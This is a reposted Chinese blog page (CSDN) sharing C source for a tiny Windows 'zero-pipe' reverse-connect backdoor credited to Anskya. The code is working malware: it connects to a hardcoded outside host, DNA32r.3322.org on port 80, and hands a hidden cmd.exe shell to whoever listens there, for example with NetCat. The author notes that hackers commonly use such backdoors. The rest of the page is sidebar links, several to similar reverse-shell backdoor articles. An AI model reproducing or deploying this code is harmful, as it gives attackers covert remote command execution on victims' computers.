1k(程序体积1kb) 反向连接,零管道后门(转)

最新推荐文章于 2024-10-12 16:11:55 发布
最新推荐文章于 2024-10-12 16:11:55 发布
阅读量856 收藏
点赞数
分类专栏: win32编程 文章标签: linker null stream socket windows 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yingfox/article/details/1907244
版权
导读:
  写ShellCode的时候写的~C版本代码~~没用就丢出来了~
  CODE:
  /*
  1k(程序体积1kb) 反向连接,零管道后门 By Anskya
  说明:
  不用我多说了吧..黑客一般都会使用的后门程序..
  这里只是简单的演示一下..没有添加进程隐藏功能
  程序可以在Win9x,Win2k,WinXP,Win2k3上使用
  程序体积只有1k(FSG压缩一下会更小)
  测试:
  本地开启NetCat等工具,监听80端口,会返回一个Shell
  */
  #pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:Entrypoint")
  #pragma comment(linker,"/INCREMENTAL:NO /IGNORE:4078")
  #pragma comment(linker,"/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=Anskya /SECTION:Anskya,EWR")
  #pragma comment(lib, "ws2_32.lib")
  #include
  #include
  #define MasterAddr "DNA32r.3322.org" //连接地址
  #define MasterPort 80 //连接端口
  void Entrypoint()
  {
  WSADATA WSADa;
  LPHOSTENT HostEnts;
  sockaddr_in SockAddrIn;
  SOCKET FSocket;
  
  PROCESS_INFORMATION ProcessInfo;
  STARTUPINFO StartupInfo;
  char szCMDPath[255];
  //-------------------
  ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
  ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
  ZeroMemory(&WSADa, sizeof(WSADATA));
  //----初始化数据----
  GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));
  //获取cmd路径
  WSAStartup(0x0202,&WSADa);
  //加载ws2_32.dll
  HostEnts=gethostbyname(MasterAddr);
  SockAddrIn.sin_family = AF_INET;
  SockAddrIn.sin_addr = *((LPIN_ADDR)*HostEnts->h_addr_list);
  SockAddrIn.sin_port = htons(MasterPort);
  FSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
  //获取远程地址和端口~绑定协议
  connect(FSocket, (LPSOCKADDR)&SockAddrIn,sizeof(SockAddrIn));
  //开始连接远程服务器
  StartupInfo.cb = sizeof(STARTUPINFO);
  StartupInfo.wShowWindow = SW_HIDE;
  StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  StartupInfo.hStdInput = (HANDLE)FSocket;
  StartupInfo.hStdOutput = (HANDLE)FSocket;
  StartupInfo.hStdError = (HANDLE)FSocket;
  //创建匿名管道
  createProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);
  WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
  CloseHandle(ProcessInfo.hProcess);
  CloseHandle(ProcessInfo.hThread);
  //关闭进程句柄
  closesocket(FSocket);
  WSACleanup();
  //关闭连接卸载ws2_32.dll
  }

本文转自
http://www.d99net.net/article.asp?id=105
yingfox
关注
专栏目录
下载马斯克Grok-1模型的实战代码
herosunly的博客
03-19 9万+
本文主要介绍了下载马斯克Grok-1模型的实战代码,希望能对学习大模型的同学们有所帮助。 文章目录 1. 前言 2. 下载方式一 3. 下载方式二
基于STC8G1K08的0.96寸IIC液晶屏驱动程序
qq_39727831的博客
07-05 3532
基于STC8G的0.96寸液晶屏驱动
反向连接后门的使用
djyangmaowei的专栏
05-29 1356
这是一个反向连接的源程序 通过对这个程序的研究我可以知道一个cmd shell是怎么建立并实现的这是一个单管道程序 为此我还专门看了一下书中所讲的管道和双管道用瑞士军刀进行监听 最后得到一个cmd shell是不是溢出攻击也是要用到这个哟 嘿嘿 幻想... #include#include#pragma comment(lib,"ws2_32.lib")void m
基于visual c++之windows核心编程代码分析(41)实现反向连接后门
weixin_30731305的博客
01-23 129
随着安全事件的不断涌现,人们的主机防护意识越来越强,各种各样的防火墙和反病毒软件都开始对来自外部的网络连接进行监控,所以传统的采用正向连接的木马已经不再适应现在的网络环境了。为了能够继续进行远程控制,木马不得不从体制上进行改变,这就出现了采用反向连接技术的。“反弹型”木马。“反弹”木马现在已经见得比较多了,但是对其技术细节介绍的文章还是比较少。为了监控危害我们伟大祖国的间谍分子,我们需要实现...
安全之路 —— 管道反向连接后门解析
雨者
03-05 1636
简介 根据前面两篇Blog介绍的双管道后门和单管道后门,他们的特点是一定需要建立管道以便进行进程间通信。但是能不能不需要管道呢?答案是可以的,这里需要借鉴重叠IO的思想,将程序中的socket函数替换成支持重叠IO的WSASocket函数。 核心知识点 si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sSock; 即将Socket...
1k(程序体积1kb) 反向连接,管道后门
古剑楠的专栏
09-23 931
1k(程序体积1kb) 反向连接,管道后门()   [ 日期: 2006-05-17 01:06 | 作者: d99 | 来自: | | ]   写ShellCode的时候写的~C版本代码~~没用就丢出来了~CODE:/*  1k(程
安全之路 —— 单管道反向连接后门解析
雨者
03-04 611
原理简述 单管道后门相对于双管道后门(参照前面发的Blog),很明显单管道后门使用了“cmd.exe /c [命令]”的用法在进行cmd进程创建时就顺带执行了命令,所以省去了由socket发往cmd的管道。同时笔者为样例程序加上了反向连接的模块,反向连接由宿主机作为client端,操纵者的nc或telnet等作为server端,与前面发的正向连接原理相反,反向连接由宿主机发出连接,可以有效...
STC8H1K28个人实训全部程序(1-3)
03-03
标题“STC8H1K28个人实训全部程序(1-3)”指的是一个针对STC8H1K28型号单片机的实践学习项目,该项目包含了三个部分(1、2、3)。STC8H1K28是一款8位微控制器,属于STC公司的增强型51系列,具有高性能、低功耗的...
M1卡破解程序 Mifare 1k
11-19
ACR122U M1卡服务程序 只要不是全扇区加密的Mifare 1k卡都能把所有扇区dump出来 结果保存在程序根目录下 格式为dump 大小为1k 用fixdump工具修复后即可正常使用 PS:程序需要 NET Farmwork 4 0支持 ...
JS1K 2013 3D蜜蜂源代码
03-29
1. **数据压缩**:为了适应1K的限制,数据必须被高度压缩。这可能包括使用特殊的编码方法来表示3D模型、颜色和其他图形元素。 2. **算法优化**:3D渲染通常涉及复杂的数学运算,如矩阵变换和向量运算。在1K的限制下...
微信小程序解决方案- 1 kb javascript覆盖状态管理,跨页通讯,插件开发和云数据库开发-腾讯/ westore
01-26
Westore - 微信小程序解决方案 覆盖状态管理、跨页通讯、插件开发和云数据库开发 - westore 进化版 - 钉钉E应用状态管理, westore 灵感衍生而来 Packages 简介 Package 介绍 westore 小程序演示项目 westore-cloud 小程序 + 腾讯云演示项目(隐形云:cloud_selector:) westore-plugin 小程序插件开发演示项目 westore-proxy 小程序底层使用 Proxy 演示项目 westore-test 测试 westore API 的小程序 westore-web 已移至 小程序开发 Web 的项目 前言 众所周知,小程序通过页面或组件各自的 setData 再加上各种父子、祖孙、姐弟、姑姑与堂兄等等组件间的通讯会把程序搞成一团浆糊,如果再加上跨页面之间的组件通讯,会让程序非常难维护和调试。虽然市面上出现了许多技术栈编译
编制一个长度为1K的消息发送和接受的程序
11-26
实验目的:了解和熟悉linux支持的消息通信机制。 任务:使用linux系统提供的系统调用msgget(),msgrev(),msgctl()编制一个长度为1K的消息发送和接受的程序。 实验要求: (1)用一个程序作为“引子”,先后fork()两个进程,SERVER和CLIENT,进行通信。 (2)SERVER端建立一个Key为75的消息队列,等待其他进程发来的消息。当遇到类型为1的消息,则作为结束信号,取消该队列,并退出SERVER。SERVER每接受到一个消息后显示一句“(Server)received”。 (3)CLIENT端使用key为75的消息队列,先后发送类型从10到1的消息,然后退出。最后一个消息,即是SERVER端需要的结束信号。CLIENT每发送一条消息后显示一句“(Client)sent”。 (4)父进程在SERVER和CLIENT都退出后结束。
简单双管道后门实现
aimarpp的专栏
11-03 1922
简单双管道后门,为shellcode后门打基础
pragma comment的使用(
u012102997的专栏
08-26 610
#pragma 的使用 尽管 C 和 C++ 都已经有标准,但是几乎每个编译器 (广义,包含连接器等) 扩展一些 C/C++ 关键字。 合理地应用这些关键字,有时候能使我们的工作非常方便。下面随便说说 Visual C++ 中 #pragma 指示符的使用。 一、用#pragma导出DLL函数     传统的到出 DLL 函数的方法是使用模块定义文件 (.def),V
若依框架生成多个sheet的Excel方法
m0_62420605的博客
10-09 392
若依框架如何创建多个Excel,且适用于任何条件下,欢迎一起探讨
力扣21~30题
SM_zeng的博客
10-10 874
我发现我都注释没怎么写过,导致写得时候思路没有特别清晰,所以要开始写注释了。
查找占用特定端口程序,并杀死
清风的博客
10-12 340
为第一步中获得的 PID。这将显示占用该端口的进程名称。执行这些步骤后,占用 9003 端口的进程就会被结束。为第一步中获得的 PID。
将一个单向链表插入到一个循环链表尾部
最新发布
笨笨的博客
10-12 250
【代码】将一个单向链表插入到一个循环链表尾部。
七、Linux 之用户管理
八戒媳妇
10-12 699
Linux 系统是一个多用户多任务的操作系统,任何一个要使用系统资源的用户,都必须首先向系统管理员申请一个账号,然后以这个账号的身份进入系统。
基于STC8G1K08A的SDI0809称重解决方案
资源摘要信息: "STC8G1K08A+SDI0809称重程序" 从给出的文件信息中,我们可以提取出以下IT知识点: 1. **STC8G1K08A单片机**: STC8G1K08A是STC公司生产的单片机,属于STC8系列,具有丰富的I/O口、较高的运行速度和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值